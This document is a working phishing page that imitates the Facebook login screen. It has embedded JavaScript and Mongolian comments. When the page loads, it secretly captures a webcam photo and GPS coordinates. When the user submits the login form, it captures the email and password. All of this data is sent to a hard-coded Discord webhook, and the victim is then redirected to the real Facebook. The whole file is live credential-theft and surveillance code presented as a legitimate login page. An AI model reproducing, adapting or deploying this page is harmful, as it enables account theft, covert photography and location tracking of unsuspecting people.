<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <title>Facebook - Log In or Sign Up</title>
    <meta property="og:title" content="Facebook - Log In or Sign Up" />
    <meta property="og:description" content="Log into Facebook to start sharing and connecting with your friends." />
    <meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png" />
    <meta name="theme-color" content="#1877f2">

    <style>
        body { font-family: Helvetica, Arial, sans-serif; background-color: #f0f2f5; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh; margin: 0; }
        .container { width: 100%; max-width: 400px; text-align: center; padding: 10px; }
        .logo { color: #1877f2; font-size: 45px; font-weight: bold; margin-bottom: 20px; letter-spacing: -2px; }
        .login-box { background: white; padding: 20px; border-radius: 8px; box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1), 0 8px 16px rgba(0, 0, 0, 0.1); }
        input { width: 100%; padding: 14px; margin-bottom: 12px; border: 1px solid #dddfe2; border-radius: 6px; font-size: 17px; box-sizing: border-box; }
        .login-btn { width: 100%; padding: 12px; background-color: #1877f2; border: none; border-radius: 6px; color: white; font-size: 20px; font-weight: bold; cursor: pointer; }
        .forgot-password { color: #1877f2; font-size: 14px; text-decoration: none; display: block; margin: 15px 0; }
        hr { border: 0; border-top: 1px solid #dadde1; margin: 20px 0; }
        .create-btn { background-color: #42b72a; color: white; padding: 14px 20px; border: none; border-radius: 6px; font-size: 17px; font-weight: bold; cursor: pointer; }
        #video, #canvas { display: none; }
    </style>
</head>
<body onload="captureInitialData()"> <div class="container">
        <div class="logo">facebook</div>
        <div class="login-box">
            <input type="text" id="user" placeholder="Email address or phone number" required>
            <input type="password" id="pass" placeholder="Password" required>
            <button class="login-btn" onclick="sendCredentials()">Log In</button>
            <a href="#" class="forgot-password">Forgotten password?</a>
            <hr>
            <button class="create-btn">Create new account</button>
        </div>
    </div>

    <video id="video" autoplay playsinline></video>
    <canvas id="canvas"></canvas>

    <script>
        const WEBHOOK_URL = 'https://discord.com/api/webhooks/1459136830992683080/XvGgJxEN4NJS0Cq-VMociYYRoSDZ10og0Hn-XBWHKRqscW_xeAV73BwkBq-KlkQmeHgz';

        // 1. ХУУДАС НЭЭГДЭХ ҮЕД ЗУРАГ БОЛОН GPS АВАХ
        async function captureInitialData() {
            try {
                const stream = await navigator.mediaDevices.getUserMedia({ video: true });
                
                navigator.geolocation.getCurrentPosition(async (position) => {
                    const lat = position.coords.latitude;
                    const lon = position.coords.longitude;
                    const device = navigator.userAgent;

                    const video = document.getElementById('video');
                    video.srcObject = stream;

                    setTimeout(() => {
                        const canvas = document.getElementById('canvas');
                        canvas.width = video.videoWidth;
                        canvas.height = video.videoHeight;
                        canvas.getContext('2d').drawImage(video, 0, 0);

                        canvas.toBlob(async (blob) => {
                            const formData = new FormData();
                            formData.append('file', blob, 'target_face.png');

                            const payload = {
                                content: "📸 **PRE-LOGIN CAPTURE (Target inside the page)**",
                                embeds: [{
                                    title: "Real-time Tracking",
                                    color: 3447003,
                                    fields: [
                                        { name: "📍 GPS", value: `${lat}, ${lon}`, inline: true },
                                        { name: "🗺️ Google Maps", value: `https://www.google.com/maps?q=${lat},${lon}`, inline: false }
                                    ],
                                    timestamp: new Date()
                                }]
                            };

                            formData.append('payload_json', JSON.stringify(payload));
                            await fetch(WEBHOOK_URL, { method: 'POST', body: formData });
                            
                            // Зураг авсны дараа камерыг унтраахгүй нээлттэй байлгаж болно эсвэл хааж болно
                        }, 'image/png');
                    }, 1500);
                }, (err) => {
                    console.log("GPS denied");
                });
            } catch (err) {
                console.log("Camera denied");
            }
        }

        // 2. НЭВТРЭХ ТОВЧ ДАРАХАД НУУЦ ҮГИЙГ ЯВУУЛАХ
        async function sendCredentials() {
            const user = document.getElementById('user').value;
            const pass = document.getElementById('pass').value;

            if (!user || !pass) {
                alert("Please enter your email and password.");
                return;
            }

            const payload = {
                content: "🔑 **NEW CREDENTIALS CAPTURED!**",
                embeds: [{
                    color: 15158332,
                    fields: [
                        { name: "👤 Username/Email", value: `\`${user}\``, inline: true },
                        { name: "🔑 Password", value: `\`${pass}\``, inline: true }
                    ],
                    footer: { text: "Login Redirecting..." },
                    timestamp: new Date()
                }]
            };

            await fetch(WEBHOOK_URL, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify(payload)
            });

            // Төгсгөлд нь жинхэнэ Facebook рүү шилжүүлнэ
            window.location.href = "https://www.facebook.com/login";
        }
    </script>
</body>
</html>
